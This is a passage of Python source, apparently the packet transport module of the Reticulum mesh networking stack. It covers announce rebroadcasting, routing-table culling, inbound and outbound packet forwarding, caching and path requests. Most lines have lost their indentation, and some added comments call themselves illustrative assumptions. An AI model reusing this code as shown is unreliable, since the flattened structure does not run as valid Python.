Transport.receipts_last_checked = time.time()
# Process announces needing retransmission
if time.time() > Transport.announces_last_checked+Transport.announces_check_interval:
for destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[destination_hash]
if announce_entry[2] > Transport.PATHFINDER_R:
RNS.log("Dropping announce for "+RNS.prettyhexrep(destination_hash)+", retries exceeded", RNS.LOG_DEBUG)
Transport.announce_table.pop(destination_hash)
break
else:
if time.time() > announce_entry[1]:
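                                # Exponential per-hop backoff: schedule the
                                # next retry C^hops seconds out, plus the
                                # grace period and rebroadcast window.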
announce_entry[1] = time.time() + math.pow(Transport.PATHFINDER_C, announce_entry[4]) + Transport.PATHFINDER_T + Transport.PATHFINDER_RW
announce_entry[2] += 1
packet = announce_entry[5]
block_rebroadcasts = announce_entry[7]
attached_interface = announce_entry[8]
announce_context = RNS.Packet.NONE
if block_rebroadcasts:
announce_context = RNS.Packet.PATH_RESPONSE
announce_data = packet.data
announce_identity = RNS.Identity.recall(packet.destination_hash)
                                announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown")
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
new_packet = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = attached_interface
)
new_packet.hops = announce_entry[4]
if block_rebroadcasts:
RNS.log("Rebroadcasting announce as path response for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
else:
RNS.log("Rebroadcasting announce for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
outgoing.append(new_packet)
# This handles an edge case where a peer sends a past
# request for a destination just after an announce for
# said destination has arrived, but before it has been
# rebroadcast locally. In such a case the actual announce
# is temporarily held, and then reinserted when the path
# request has been served to the peer.
if destination_hash in Transport.held_announces:
held_entry = Transport.held_announces.pop(destination_hash)
Transport.announce_table[destination_hash] = held_entry
RNS.log("Reinserting held announce into table", RNS.LOG_DEBUG)
Transport.announces_last_checked = time.time()
# Cull the packet hashlist if it has reached max size
if len(Transport.packet_hashlist) > Transport.hashlist_maxsize:
                    Transport.packet_hashlist = Transport.packet_hashlist[-Transport.hashlist_maxsize:]
if time.time() > Transport.tables_last_culled + Transport.tables_cull_interval:
# Cull the reverse table according to timeout
                    stale_reverse_entries = []
                    for truncated_packet_hash in Transport.reverse_table:
                        reverse_entry = Transport.reverse_table[truncated_packet_hash]
                        if time.time() > reverse_entry[2] + Transport.REVERSE_TIMEOUT:
                            stale_reverse_entries.append(truncated_packet_hash)
                    # Pop outside the iteration; mutating a dict while
                    # iterating over it raises RuntimeError.
                    for truncated_packet_hash in stale_reverse_entries:
                        Transport.reverse_table.pop(truncated_packet_hash)
# Cull the link table according to timeout
stale_links = []
for link_id in Transport.link_table:
link_entry = Transport.link_table[link_id]
if time.time() > link_entry[0] + Transport.LINK_TIMEOUT:
stale_links.append(link_id)
# Cull the path table
stale_paths = []
for destination_hash in Transport.destination_table:
destination_entry = Transport.destination_table[destination_hash]
attached_interface = destination_entry[5]
if time.time() > destination_entry[0] + Transport.DESTINATION_TIMEOUT:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" timed out and was removed", RNS.LOG_DEBUG)
if not attached_interface in Transport.interfaces:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" was removed since the attached interface no longer exists", RNS.LOG_DEBUG)
i = 0
for link_id in stale_links:
Transport.link_table.pop(link_id)
i += 1
if i > 0:
if i == 1:
RNS.log("Dropped "+str(i)+" link", RNS.LOG_DEBUG)
else:
RNS.log("Dropped "+str(i)+" links", RNS.LOG_DEBUG)
i = 0
for destination_hash in stale_paths:
Transport.destination_table.pop(destination_hash)
i += 1
if i > 0:
if i == 1:
RNS.log("Removed "+str(i)+" path", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(i)+" paths", RNS.LOG_DEBUG)
Transport.tables_last_culled = time.time()
except Exception as e:
RNS.log("An exception occurred while running Transport jobs.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
traceback.print_exc()
Transport.jobs_running = False
for packet in outgoing:
packet.send()
@staticmethod
def outbound(packet):
        while Transport.jobs_running:
sleep(0.01)
Transport.jobs_locked = True
# TODO: This updateHash call might be redundant
packet.update_hash()
sent = False
# Check if we have a known path for the destination in the path table
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.destination_hash in Transport.destination_table:
outbound_interface = Transport.destination_table[packet.destination_hash][5]
# If there's more than one hop to the destination, and we know
# a path, we insert the packet into transport by adding the next
# transport nodes address to the header, and modifying the flags.
# This rule applies both for "normal" transport, and when connected
# to a local shared Reticulum instance.
if Transport.destination_table[packet.destination_hash][2] > 1:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
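                    # Flag byte layout: bits 7-6 carry the header type,
                    # bits 5-4 the transport type, and the low nibble keeps
                    # the packet's original flags.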
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# In the special case where we are connected to a local shared
# Reticulum instance, and the destination is one hop away, we
# also add transport headers to inject the packet into transport
# via the shared instance. Normally a packet for a destination
# one hop away would just be broadcast directly, but since we
# are "behind" a shared instance, we need to get that instance
# to transport it onto the network.
elif Transport.destination_table[packet.destination_hash][2] == 1 and Transport.owner.is_connected_to_shared_instance:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# If none of the above applies, we know the destination is
# directly reachable, and also on which interface, so we
# simply transmit the packet directly on that one.
else:
outbound_interface.processOutgoing(packet.raw)
sent = True
# If we don't have a known path for the destination, we'll
# broadcast the packet on all outgoing interfaces, or the
# just the relevant interface if the packet has an attached
# interface, or belongs to a link.
else:
stored_hash = False
for interface in Transport.interfaces:
if interface.OUT:
should_transmit = True
if packet.destination.type == RNS.Destination.LINK:
if packet.destination.status == RNS.Link.CLOSED:
should_transmit = False
if interface != packet.destination.attached_interface:
should_transmit = False
if packet.attached_interface != None and interface != packet.attached_interface:
should_transmit = False
                    if should_transmit:
                        if not stored_hash:
                            Transport.packet_hashlist.append(packet.packet_hash)
                            stored_hash = True
interface.processOutgoing(packet.raw)
sent = True
if sent:
packet.sent = True
packet.sent_at = time.time()
# Don't generate receipt if it has been explicitly disabled
if (packet.create_receipt == True and
# Only generate receipts for DATA packets
packet.packet_type == RNS.Packet.DATA and
# Don't generate receipts for PLAIN destinations
packet.destination.type != RNS.Destination.PLAIN and
# Don't generate receipts for link-related packets
not (packet.context >= RNS.Packet.KEEPALIVE and packet.context <= RNS.Packet.LRPROOF) and
# Don't generate receipts for resource packets
not (packet.context >= RNS.Packet.RESOURCE and packet.context <= RNS.Packet.RESOURCE_RCL)):
packet.receipt = RNS.PacketReceipt(packet)
Transport.receipts.append(packet.receipt)
Transport.cache(packet)
Transport.jobs_locked = False
return sent
@staticmethod
def packet_filter(packet):
# TODO: Think long and hard about this.
# Is it even strictly necessary with the current
# transport rules?
if packet.context == RNS.Packet.KEEPALIVE:
return True
if packet.context == RNS.Packet.RESOURCE_REQ:
return True
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
if packet.context == RNS.Packet.RESOURCE:
return True
if packet.context == RNS.Packet.CACHE_REQUEST:
return True
if packet.destination_type == RNS.Destination.PLAIN:
return True
if not packet.packet_hash in Transport.packet_hashlist:
return True
else:
if packet.packet_type == RNS.Packet.ANNOUNCE:
return True
RNS.log("Filtered packet with hash "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_DEBUG)
return False
@staticmethod
def inbound(raw, interface=None):
        while Transport.jobs_running:
sleep(0.01)
Transport.jobs_locked = True
packet = RNS.Packet(None, raw)
packet.unpack()
packet.receiving_interface = interface
packet.hops += 1
if len(Transport.local_client_interfaces) > 0:
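            # Don't count the hop over a local shared-instance socket;
            # clients behind a shared instance should look directly reachable.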
if Transport.is_local_client_interface(interface):
packet.hops -= 1
elif Transport.interface_to_shared_instance(interface):
packet.hops -= 1
if Transport.packet_filter(packet):
Transport.packet_hashlist.append(packet.packet_hash)
Transport.cache(packet)
# Check special conditions for local clients connected
# through a shared Reticulum instance
from_local_client = (packet.receiving_interface in Transport.local_client_interfaces)
for_local_client = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.destination_table and Transport.destination_table[packet.destination_hash][2] == 0)
for_local_client_link = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][4] in Transport.local_client_interfaces)
for_local_client_link |= (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][2] in Transport.local_client_interfaces)
proof_for_local_client = (packet.destination_hash in Transport.reverse_table) and (Transport.reverse_table[packet.destination_hash][0] in Transport.local_client_interfaces)
# Plain broadcast packets from local clients are sent
# directly on all attached interfaces, since they are
# never injected into transport.
if not packet.destination_hash in Transport.control_hashes:
if packet.destination_type == RNS.Destination.PLAIN and packet.transport_type == Transport.BROADCAST:
# Send to all interfaces except the originator
if from_local_client:
for interface in Transport.interfaces:
if interface != packet.receiving_interface:
interface.processOutgoing(packet.raw)
# If the packet was not from a local client, send
# it directly to all local clients
else:
for interface in Transport.local_client_interfaces:
interface.processOutgoing(packet.raw)
# General transport handling. Takes care of directing
# packets according to transport tables and recording
# entries in reverse and link tables.
if RNS.Reticulum.transport_enabled() or from_local_client or for_local_client or for_local_client_link:
# If there is no transport id, but the packet is
# for a local client, we generate the transport
# id (it was stripped on the previous hop, since
# we "spoof" the hop count for clients behind a
# shared instance, so they look directly reach-
# able), and reinsert, so the normal transport
# implementation can handle the packet.
if packet.transport_id == None and for_local_client:
packet.transport_id = Transport.identity.hash
                # If this is a cache request, and we can fulfill
# it, do so and stop processing. Otherwise resume
# normal processing.
if packet.context == RNS.Packet.CACHE_REQUEST:
if Transport.cache_request_packet(packet):
return
# If the packet is in transport, check whether we
# are the designated next hop, and process it
# accordingly if we are.
if packet.transport_id != None and packet.packet_type != RNS.Packet.ANNOUNCE:
if packet.transport_id == Transport.identity.hash:
if packet.destination_hash in Transport.destination_table:
next_hop = Transport.destination_table[packet.destination_hash][1]
remaining_hops = Transport.destination_table[packet.destination_hash][2]
if remaining_hops > 1:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += next_hop
new_raw += packet.raw[12:]
elif remaining_hops == 1:
# Strip transport headers and transmit
new_flags = (RNS.Packet.HEADER_1) << 6 | (Transport.BROADCAST) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[12:]
elif remaining_hops == 0:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface = Transport.destination_table[packet.destination_hash][5]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
if packet.packet_type == RNS.Packet.LINKREQUEST:
# Entry format is
link_entry = [ time.time(), # 0: Timestamp,
next_hop, # 1: Next-hop transport ID
outbound_interface, # 2: Next-hop interface
remaining_hops, # 3: Remaining hops
packet.receiving_interface, # 4: Received on interface
packet.hops, # 5: Taken hops
packet.destination_hash, # 6: Original destination hash
False] # 7: Validated
Transport.link_table[packet.getTruncatedHash()] = link_entry
else:
# Entry format is
reverse_entry = [ packet.receiving_interface, # 0: Received on interface
outbound_interface, # 1: Outbound interface
time.time()] # 2: Timestamp
Transport.reverse_table[packet.getTruncatedHash()] = reverse_entry
else:
# TODO: There should probably be some kind of REJECT
# mechanism here, to signal to the source that their
# expected path failed.
RNS.log("Got packet in transport, but no known path to final destination. Dropping packet.", RNS.LOG_DEBUG)
# Link transport handling. Directs packets according
# to entries in the link tables
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.packet_type != RNS.Packet.LINKREQUEST and packet.context != RNS.Packet.LRPROOF:
if packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
# If receiving and outbound interface is
# the same for this link, direction doesn't
# matter, and we simply send the packet on.
outbound_interface = None
if link_entry[2] == link_entry[4]:
                        # But check that the taken hops match one
                        # of the expected values.
if packet.hops == link_entry[3] or packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
else:
# If interfaces differ, we transmit on
# the opposite interface of what the
# packet was received on.
if packet.receiving_interface == link_entry[2]:
# Also check that expected hop count matches
if packet.hops == link_entry[3]:
outbound_interface = link_entry[4]
elif packet.receiving_interface == link_entry[4]:
# Also check that expected hop count matches
if packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
if outbound_interface != None:
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.link_table[packet.destination_hash][0] = time.time()
else:
pass
# Announce handling. Handles logic related to incoming
# announces, queueing rebroadcasts of these, and removal
# of queued announce rebroadcasts once handed to the next node.
if packet.packet_type == RNS.Packet.ANNOUNCE:
local_destination = next((d for d in Transport.destinations if d.hash == packet.destination_hash), None)
if local_destination == None and RNS.Identity.validate_announce(packet):
if packet.transport_id != None:
received_from = packet.transport_id
                        # Check if this is the next retransmission from
                        # another node. If it is, we remove the
                        # announce in question from our pending table
if RNS.Reticulum.transport_enabled() and packet.destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[packet.destination_hash]
if packet.hops-1 == announce_entry[4]:
RNS.log("Heard a local rebroadcast of announce for "+RNS.prettyhexrep(packet.destination_hash), RNS.LOG_DEBUG)
announce_entry[6] += 1
if announce_entry[6] >= Transport.LOCAL_REBROADCASTS_MAX:
RNS.log("Max local rebroadcasts of announce for "+RNS.prettyhexrep(packet.destination_hash)+" reached, dropping announce from our table", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
if packet.hops-1 == announce_entry[4]+1 and announce_entry[2] > 0:
now = time.time()
if now < announce_entry[1]:
RNS.log("Rebroadcasted announce for "+RNS.prettyhexrep(packet.destination_hash)+" has been passed on to next node, no further tries needed", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
else:
received_from = packet.destination_hash
# Check if this announce should be inserted into
# announce and destination tables
should_add = False
# First, check that the announce is not for a destination
# local to this system, and that hops are less than the max
if (not any(packet.destination_hash == d.hash for d in Transport.destinations) and packet.hops < Transport.PATHFINDER_M+1):
random_blob = packet.data[RNS.Identity.KEYSIZE//8+10:RNS.Identity.KEYSIZE//8+20]
random_blobs = []
if packet.destination_hash in Transport.destination_table:
random_blobs = Transport.destination_table[packet.destination_hash][4]
                            # If we already have a path to the announced
                            # destination, and the hop count is equal or
                            # lower, we'll update our tables.
if packet.hops <= Transport.destination_table[packet.destination_hash][2]:
# Make sure we haven't heard the random
# blob before, so announces can't be
# replayed to forge paths.
# TODO: Check whether this approach works
# under all circumstances
if not random_blob in random_blobs:
should_add = True
else:
should_add = False
else:
# If an announce arrives with a larger hop
# count than we already have in the table,
# ignore it, unless the path is expired
if (time.time() > Transport.destination_table[packet.destination_hash][3]):
# We also check that the announce hash is
# different from ones we've already heard,
# to avoid loops in the network
if not random_blob in random_blobs:
# TODO: Check that this ^ approach actually
# works under all circumstances
RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce due to expired path", RNS.LOG_DEBUG)
should_add = True
else:
should_add = False
else:
should_add = False
else:
# If this destination is unknown in our table
# we should add it
should_add = True
if should_add:
now = time.time()
retries = 0
expires = now + Transport.PATHFINDER_E
announce_hops = packet.hops
local_rebroadcasts = 0
block_rebroadcasts = False
attached_interface = None
retransmit_timeout = now + math.pow(Transport.PATHFINDER_C, packet.hops) + (RNS.rand() * Transport.PATHFINDER_RW)
random_blobs.append(random_blob)
if (RNS.Reticulum.transport_enabled() or Transport.from_local_client(packet)) and packet.context != RNS.Packet.PATH_RESPONSE:
# If the announce is from a local client,
# we announce it immediately, but only one
# time.
if Transport.from_local_client(packet):
retransmit_timeout = now
retries = Transport.PATHFINDER_R
Transport.announce_table[packet.destination_hash] = [
now,
retransmit_timeout,
retries,
received_from,
announce_hops,
packet,
local_rebroadcasts,
block_rebroadcasts,
attached_interface
]
# If we have any local clients connected, we re-
# transmit the announce to them immediately
if (len(Transport.local_client_interfaces)):
announce_identity = RNS.Identity.recall(packet.destination_hash)
                            announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown")
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
announce_context = RNS.Packet.NONE
announce_data = packet.data
if Transport.from_local_client(packet) and packet.context == RNS.Packet.PATH_RESPONSE:
for interface in Transport.interfaces:
if packet.receiving_interface != interface:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = interface
)
new_announce.hops = packet.hops
new_announce.send()
else:
for local_interface in Transport.local_client_interfaces:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = local_interface
)
new_announce.hops = packet.hops
new_announce.send()
Transport.destination_table[packet.destination_hash] = [now, received_from, announce_hops, expires, random_blobs, packet.receiving_interface, packet]
RNS.log("Path to "+RNS.prettyhexrep(packet.destination_hash)+" is now "+str(announce_hops)+" hops away via "+RNS.prettyhexrep(received_from)+" on "+str(packet.receiving_interface), RNS.LOG_VERBOSE)
# Call externally registered callbacks from apps
# wanting to know when an announce arrives
for handler in Transport.announce_handlers:
try:
# Check that the announced destination matches
# the handlers aspect filter
execute_callback = False
if handler.aspect_filter == None:
# If the handlers aspect filter is set to
# None, we execute the callback in all cases
execute_callback = True
else:
announce_identity = RNS.Identity.recall(packet.destination_hash)
handler_expected_hash = RNS.Destination.hash_from_name_and_identity(handler.aspect_filter, announce_identity)
if packet.destination_hash == handler_expected_hash:
execute_callback = True
if execute_callback:
handler.received_announce(
destination_hash=packet.destination_hash,
announced_identity=announce_identity,
app_data=RNS.Identity.recall_app_data(packet.destination_hash)
)
except Exception as e:
RNS.log("Error while processing external announce callback.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
# Handling for linkrequests to local destinations
elif packet.packet_type == RNS.Packet.LINKREQUEST:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
# Handling for local data packets
elif packet.packet_type == RNS.Packet.DATA:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
link.receive(packet)
else:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
if destination.proof_strategy == RNS.Destination.PROVE_ALL:
packet.prove()
elif destination.proof_strategy == RNS.Destination.PROVE_APP:
if destination.callbacks.proof_requested:
if destination.callbacks.proof_requested(packet):
packet.prove()
# Handling for proofs and link-request proofs
elif packet.packet_type == RNS.Packet.PROOF:
if packet.context == RNS.Packet.LRPROOF:
# This is a link request proof, check if it
# needs to be transported
if (RNS.Reticulum.transport_enabled() or for_local_client_link or from_local_client) and packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
if packet.receiving_interface == link_entry[2]:
# TODO: Should we validate the LR proof at each transport
# step before transporting it?
RNS.log("Link request proof received on correct interface, transporting it via "+str(link_entry[4]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
Transport.link_table[packet.destination_hash][7] = True
link_entry[4].processOutgoing(new_raw)
else:
RNS.log("Link request proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
else:
# Check if we can deliver it to a local
# pending link
for link in Transport.pending_links:
if link.link_id == packet.destination_hash:
link.validate_proof(packet)
elif packet.context == RNS.Packet.RESOURCE_PRF:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
link.receive(packet)
else:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
if len(packet.data) == RNS.PacketReceipt.EXPL_LENGTH:
proof_hash = packet.data[:RNS.Identity.HASHLENGTH//8]
else:
proof_hash = None
                    # Check if this proof needs to be transported
if (RNS.Reticulum.transport_enabled() or from_local_client or proof_for_local_client) and packet.destination_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table.pop(packet.destination_hash)
if packet.receiving_interface == reverse_entry[1]:
RNS.log("Proof received on correct interface, transporting it via "+str(reverse_entry[0]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
reverse_entry[0].processOutgoing(new_raw)
else:
RNS.log("Proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
for receipt in Transport.receipts:
receipt_validated = False
if proof_hash != None:
# Only test validation if hash matches
if receipt.hash == proof_hash:
receipt_validated = receipt.validate_proof_packet(packet)
else:
# TODO: This looks like it should actually
# be rewritten when implicit proofs are added.
# In case of an implicit proof, we have
# to check every single outstanding receipt
receipt_validated = receipt.validate_proof_packet(packet)
if receipt_validated:
Transport.receipts.remove(receipt)
Transport.jobs_locked = False
@staticmethod
def register_destination(destination):
destination.MTU = RNS.Reticulum.MTU
if destination.direction == RNS.Destination.IN:
for registered_destination in Transport.destinations:
if destination.hash == registered_destination.hash:
raise KeyError("Attempt to register an already registered destination.")
Transport.destinations.append(destination)
if Transport.owner.is_connected_to_shared_instance:
if destination.type == RNS.Destination.SINGLE:
destination.announce(path_response=True)
@staticmethod
def deregister_destination(destination):
if destination in Transport.destinations:
Transport.destinations.remove(destination)
@staticmethod
def register_link(link):
RNS.log("Registering link "+str(link), RNS.LOG_DEBUG)
if link.initiator:
Transport.pending_links.append(link)
else:
Transport.active_links.append(link)
@staticmethod
def activate_link(link):
RNS.log("Activating link "+str(link), RNS.LOG_DEBUG)
if link in Transport.pending_links:
Transport.pending_links.remove(link)
Transport.active_links.append(link)
link.status = RNS.Link.ACTIVE
else:
RNS.log("Attempted to activate a link that was not in the pending table", RNS.LOG_ERROR)
@staticmethod
def register_announce_handler(handler):
"""
Registers an announce handler.
:param handler: Must be an object with an *aspect_filter* attribute and a *received_announce(destination_hash, announced_identity, app_data)* callable. See the :ref:`Announce Example<example-announce>` for more info.
"""
if hasattr(handler, "received_announce") and callable(handler.received_announce):
if hasattr(handler, "aspect_filter"):
Transport.announce_handlers.append(handler)
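# Illustrative sketch (an assumption, not part of the original source):
# a minimal handler object satisfying the contract documented above.
# The aspect_filter value is hypothetical.
#
# class ExampleAnnounceHandler:
#     aspect_filter = "example_utilities.announcesample"
#     def received_announce(self, destination_hash, announced_identity, app_data):
#         RNS.log("Announce from " + RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
#
# Transport.register_announce_handler(ExampleAnnounceHandler())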
@staticmethod
def deregister_announce_handler(handler):
"""
Deregisters an announce handler.
:param handler: The announce handler to be deregistered.
"""
while handler in Transport.announce_handlers:
Transport.announce_handlers.remove(handler)
@staticmethod
def find_interface_from_hash(interface_hash):
for interface in Transport.interfaces:
if interface.get_hash() == interface_hash:
return interface
return None
@staticmethod
def should_cache(packet):
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
return False
# When caching packets to storage, they are written
# exactly as they arrived over their interface. This
# means that they have not had their hop count
# increased yet! Take note of this when reading from
# the packet cache.
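# Illustrative sketch (an assumption, not from the original source): a
# reader replaying a cached packet feeds the stored raw bytes back
# through Transport.inbound(), as cache_request() below does, so the
# hop count is re-applied by normal inbound processing.
#
# cached = Transport.get_cached_packet(some_packet_hash)  # hypothetical hash
# if cached != None:
#     Transport.inbound(cached.raw, cached.receiving_interface)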
@staticmethod
def cache(packet, force_cache=False):
if RNS.Transport.should_cache(packet) or force_cache:
try:
packet_hash = RNS.hexrep(packet.get_hash(), delimit=False)
interface_reference = None
if packet.receiving_interface != None:
interface_reference = str(packet.receiving_interface)
file = open(RNS.Reticulum.cachepath+"/"+packet_hash, "wb")
file.write(umsgpack.packb([packet.raw, interface_reference]))
file.close()
except Exception as e:
RNS.log("Error writing packet to cache", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e))
@staticmethod
def get_cached_packet(packet_hash):
try:
packet_hash = RNS.hexrep(packet_hash, delimit=False)
path = RNS.Reticulum.cachepath+"/"+packet_hash
if os.path.isfile(path):
file = open(path, "rb")
cached_data = umsgpack.unpackb(file.read())
file.close()
packet = RNS.Packet(None, cached_data[0])
interface_reference = cached_data[1]
for interface in Transport.interfaces:
if str(interface) == interface_reference:
packet.receiving_interface = interface
return packet
else:
return None
except Exception as e:
RNS.log("Exception occurred while getting cached packet.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
@staticmethod
def cache_request_packet(packet):
if len(packet.data) == RNS.Identity.HASHLENGTH//8:
packet = Transport.get_cached_packet(packet.data)
if packet != None:
# If the packet was retrieved from the local
# cache, replay it to the Transport instance,
# so that it can be directed towards its original
# destination.
Transport.inbound(packet.raw, packet.receiving_interface)
return True
else:
return False
else:
return False
@staticmethod
def cache_request(packet_hash, destination):
cached_packet = Transport.get_cached_packet(packet_hash)
if cached_packet:
# The packet was found in the local cache,
# replay it to the Transport instance.
Transport.inbound(cached_packet.raw, cached_packet.receiving_interface)
else:
# The packet is not in the local cache,
# query the network.
RNS.Packet(destination, packet_hash, context = RNS.Packet.CACHE_REQUEST).send()
@staticmethod
def has_path(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: *True* if a path to the destination is known, otherwise *False*.
"""
if destination_hash in Transport.destination_table:
return True
else:
return False
@staticmethod
def hops_to(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The number of hops to the specified destination, or ``RNS.Transport.PATHFINDER_M`` if the number of hops is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][2]
else:
return Transport.PATHFINDER_M
@staticmethod
def request_path(destination_hash):
"""
Requests a path to the destination from the network. If
another reachable peer on the network knows a path, it
will announce it.
:param destination_hash: A destination hash as *bytes*.
"""
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1)
packet.send()
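# Illustrative sketch (an assumption, not from the original source):
# typical use of the path API above. The destination hash is hypothetical.
#
# destination_hash = bytes.fromhex("deadbeef00112233445566778899aabb")
# if not Transport.has_path(destination_hash):
#     Transport.request_path(destination_hash)
# RNS.log("Hops to destination: " + str(Transport.hops_to(destination_hash)))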
@staticmethod
def request_path_on_interface(destination_hash, interface):
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1, attached_interface = interface)
packet.send()
@staticmethod
def path_request_handler(data, packet):
if len(data) >= RNS.Identity.TRUNCATED_HASHLENGTH//8:
Transport.path_request(
data[:RNS.Identity.TRUNCATED_HASHLENGTH//8],
Transport.from_local_client(packet),
packet.receiving_interface
)
@staticmethod
def path_request(destination_hash, is_from_local_client, attached_interface):
RNS.log("Path request for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
local_destination = next((d for d in Transport.destinations if d.hash == destination_hash), None)
if local_destination != None:
RNS.log("Destination is local to this system, announcing", RNS.LOG_DEBUG)
local_destination.announce(path_response=True)
elif (RNS.Reticulum.transport_enabled() or is_from_local_client) and destination_hash in Transport.destination_table:
RNS.log("Path found, inserting announce for transmission", RNS.LOG_DEBUG)
packet = Transport.destination_table[destination_hash][6]
received_from = Transport.destination_table[destination_hash][5]
now = time.time()
retries = Transport.PATHFINDER_R
local_rebroadcasts = 0
block_rebroadcasts = True
announce_hops = packet.hops
if is_from_local_client:
retransmit_timeout = now
else:
# TODO: Look at this timing
retransmit_timeout = now + Transport.PATH_REQUEST_GRACE # + (RNS.rand() * Transport.PATHFINDER_RW)
# This handles an edge case where a peer sends a past
# request for a destination just after an announce for
# said destination has arrived, but before it has been
# rebroadcast locally. In such a case the actual announce
# is temporarily held, and then reinserted when the path
# request has been served to the peer.
if packet.destination_hash in Transport.announce_table:
